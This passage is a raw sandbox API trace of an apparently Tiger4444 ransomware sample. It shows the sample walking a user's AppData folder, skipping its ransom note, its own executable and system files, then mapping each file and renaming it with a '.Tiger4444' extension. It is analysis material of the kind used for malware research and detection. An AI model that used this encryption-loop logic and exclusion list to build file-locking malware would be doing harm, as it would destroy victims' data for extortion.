(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Lfhe6KRJPHl.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lfhe6krjphl.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.023] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.023] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14147632394) returned 1 [0050.023] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=44788) returned 1 [0050.023] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.023] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0050.023] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb200, lpName=0x0) returned 0x2c8 [0050.023] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb200) returned 0xbe0000 [0050.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.025] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14147841625) returned 1 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0050.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0050.025] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.026] CloseHandle (hObject=0x2c8) returned 1 [0050.026] CloseHandle (hObject=0x260) returned 1 [0050.027] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Lfhe6KRJPHl.ods.Tiger4444") returned 57 [0050.027] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Lfhe6KRJPHl.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lfhe6krjphl.ods"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Lfhe6KRJPHl.ods.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lfhe6krjphl.ods.tiger4444"), dwFlags=0x1) returned 1 [0050.027] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61735130, ftCreationTime.dwHighDateTime=0x1d4cd42, ftLastAccessTime.dwLowDateTime=0x5d920e00, ftLastAccessTime.dwHighDateTime=0x1d4cdb3, ftLastWriteTime.dwLowDateTime=0x5d920e00, ftLastWriteTime.dwHighDateTime=0x1d4cdb3, nFileSizeHigh=0x0, nFileSizeLow=0x4a94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LVOHH_6_OObqP.odp", cAlternateFileName="LVOHH_~1.ODP")) returned 1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="Tiger4444.exe") returned -1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2=".") returned 1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="..") returned 1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="windows") returned -1 [0050.027] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="bootmgr") returned 1 [0050.028] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="pagefile.sys") returned -1 [0050.028] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="boot") returned 1 [0050.028] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="ids.txt") returned 1 [0050.028] lstrcmpiW (lpString1="LVOHH_6_OObqP.odp", lpString2="NTUSER.DAT") returned -1 [0050.028] lstrcpyW (in: lpString1=0x30aeae8, lpString2="LVOHH_6_OObqP.odp" | out: lpString1="LVOHH_6_OObqP.odp") returned="LVOHH_6_OObqP.odp" [0050.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\LVOHH_6_OObqP.odp", dwFileAttributes=0x0) returned 1 [0050.028] lstrlenW (lpString="LVOHH_6_OObqP.odp") returned 17 [0050.028] lstrlenW (lpString="Tiger4444") returned 9 [0050.028] lstrcmpiW (lpString1="OObqP.odp", lpString2="Tiger4444") returned -1 [0050.028] lstrlenW (lpString=".dll") returned 4 [0050.028] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0050.028] lstrlenW (lpString=".lnk") returned 4 [0050.028] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0050.028] lstrlenW (lpString=".ini") returned 4 [0050.028] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0050.028] lstrlenW (lpString=".sys") returned 4 [0050.028] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0050.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\LVOHH_6_OObqP.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lvohh_6_oobqp.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.028] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.028] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14148150071) returned 1 [0050.028] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=19092) returned 1 [0050.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0050.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0050.029] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4da0, lpName=0x0) returned 0x2c8 [0050.029] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4da0) returned 0xbe0000 [0050.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.030] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14148290843) returned 1 [0050.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0050.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0050.030] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.030] CloseHandle (hObject=0x2c8) returned 1 [0050.030] CloseHandle (hObject=0x260) returned 1 [0050.032] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\LVOHH_6_OObqP.odp.Tiger4444") returned 59 [0050.032] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\LVOHH_6_OObqP.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lvohh_6_oobqp.odp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\LVOHH_6_OObqP.odp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lvohh_6_oobqp.odp.tiger4444"), dwFlags=0x1) returned 1 [0050.033] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf446c780, ftCreationTime.dwHighDateTime=0x1d4c946, ftLastAccessTime.dwLowDateTime=0xe37f2100, ftLastAccessTime.dwHighDateTime=0x1d4d570, ftLastWriteTime.dwLowDateTime=0xe37f2100, ftLastWriteTime.dwHighDateTime=0x1d4d570, nFileSizeHigh=0x0, nFileSizeLow=0x832e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l_m6ACh-WGgkO-6.mkv", cAlternateFileName="L_M6AC~1.MKV")) returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="Tiger4444.exe") returned -1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2=".") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="..") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="windows") returned -1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="bootmgr") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="pagefile.sys") returned -1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="boot") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="ids.txt") returned 1 [0050.033] lstrcmpiW (lpString1="l_m6ACh-WGgkO-6.mkv", lpString2="NTUSER.DAT") returned -1 [0050.033] lstrcpyW (in: lpString1=0x30aeae8, lpString2="l_m6ACh-WGgkO-6.mkv" | out: lpString1="l_m6ACh-WGgkO-6.mkv") returned="l_m6ACh-WGgkO-6.mkv" [0050.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\l_m6ACh-WGgkO-6.mkv", dwFileAttributes=0x0) returned 1 [0050.033] lstrlenW (lpString="l_m6ACh-WGgkO-6.mkv") returned 19 [0050.033] lstrlenW (lpString="Tiger4444") returned 9 [0050.033] lstrcmpiW (lpString1="gkO-6.mkv", lpString2="Tiger4444") returned -1 [0050.033] lstrlenW (lpString=".dll") returned 4 [0050.033] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0050.034] lstrlenW (lpString=".lnk") returned 4 [0050.034] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0050.034] lstrlenW (lpString=".ini") returned 4 [0050.034] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0050.034] lstrlenW (lpString=".sys") returned 4 [0050.034] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0050.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\l_m6ACh-WGgkO-6.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\l_m6ach-wggko-6.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.034] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.034] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14148697917) returned 1 [0050.034] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=33582) returned 1 [0050.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0050.034] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8630, lpName=0x0) returned 0x2c8 [0050.034] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8630) returned 0xbe0000 [0050.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0050.035] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0050.036] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14148924043) returned 1 [0050.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0050.036] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.037] CloseHandle (hObject=0x2c8) returned 1 [0050.037] CloseHandle (hObject=0x260) returned 1 [0050.037] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\l_m6ACh-WGgkO-6.mkv.Tiger4444") returned 61 [0050.037] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\l_m6ACh-WGgkO-6.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\l_m6ach-wggko-6.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\l_m6ACh-WGgkO-6.mkv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\l_m6ach-wggko-6.mkv.tiger4444"), dwFlags=0x1) returned 1 [0050.038] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="Tiger4444.exe") returned -1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2=".") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="..") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="windows") returned -1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="bootmgr") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="pagefile.sys") returned -1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="boot") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="ids.txt") returned 1 [0050.038] lstrcmpiW (lpString1="Macromedia", lpString2="NTUSER.DAT") returned -1 [0050.038] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Macromedia" | out: lpString1="Macromedia") returned="Macromedia" [0050.038] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0050.038] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x56) returned 0xc60fe8 [0050.038] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0050.038] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2="Tiger4444.exe") returned -1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0050.038] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0050.039] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0050.039] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0050.039] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0050.039] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0050.039] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0050.039] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", dwFileAttributes=0x10) returned 1 [0050.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0050.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x54) returned 0xc765e8 [0050.039] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664e8 [0050.039] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="Tiger4444.exe") returned -1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="bootmgr") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="pagefile.sys") returned -1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="boot") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="ids.txt") returned 1 [0050.039] lstrcmpiW (lpString1="Mozilla", lpString2="NTUSER.DAT") returned -1 [0050.039] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0050.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0050.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x50) returned 0xc73980 [0050.039] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66308 [0050.039] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb996020, ftCreationTime.dwHighDateTime=0x1d4cf65, ftLastAccessTime.dwLowDateTime=0x81672050, ftLastAccessTime.dwHighDateTime=0x1d4ce4d, ftLastWriteTime.dwLowDateTime=0x81672050, ftLastWriteTime.dwHighDateTime=0x1d4ce4d, nFileSizeHigh=0x0, nFileSizeLow=0x1a57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n yYkI2ney_gz_-zE.jpg", cAlternateFileName="NYYKI2~1.JPG")) returned 1 [0050.039] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.039] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.039] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="Tiger4444.exe") returned -1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2=".") returned 1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="..") returned 1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="windows") returned -1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="bootmgr") returned 1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="pagefile.sys") returned -1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="boot") returned 1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="ids.txt") returned 1 [0050.040] lstrcmpiW (lpString1="n yYkI2ney_gz_-zE.jpg", lpString2="NTUSER.DAT") returned -1 [0050.040] lstrcpyW (in: lpString1=0x30aeae8, lpString2="n yYkI2ney_gz_-zE.jpg" | out: lpString1="n yYkI2ney_gz_-zE.jpg") returned="n yYkI2ney_gz_-zE.jpg" [0050.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\n yYkI2ney_gz_-zE.jpg", dwFileAttributes=0x0) returned 1 [0050.040] lstrlenW (lpString="n yYkI2ney_gz_-zE.jpg") returned 21 [0050.040] lstrlenW (lpString="Tiger4444") returned 9 [0050.040] lstrcmpiW (lpString1="z_-zE.jpg", lpString2="Tiger4444") returned 1 [0050.040] lstrlenW (lpString=".dll") returned 4 [0050.040] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.040] lstrlenW (lpString=".lnk") returned 4 [0050.040] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.040] lstrlenW (lpString=".ini") returned 4 [0050.040] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.040] lstrlenW (lpString=".sys") returned 4 [0050.040] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.040] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\n yYkI2ney_gz_-zE.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n yyki2ney_gz_-ze.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.040] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.040] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14149359029) returned 1 [0050.041] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6743) returned 1 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0050.041] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d60, lpName=0x0) returned 0x2c8 [0050.041] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d60) returned 0xbe0000 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.041] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.041] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.042] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.042] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.042] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.042] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14149473414) returned 1 [0050.042] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0050.042] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0050.042] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.042] CloseHandle (hObject=0x2c8) returned 1 [0050.042] CloseHandle (hObject=0x260) returned 1 [0050.042] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\n yYkI2ney_gz_-zE.jpg.Tiger4444") returned 63 [0050.043] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\n yYkI2ney_gz_-zE.jpg" (normalized: 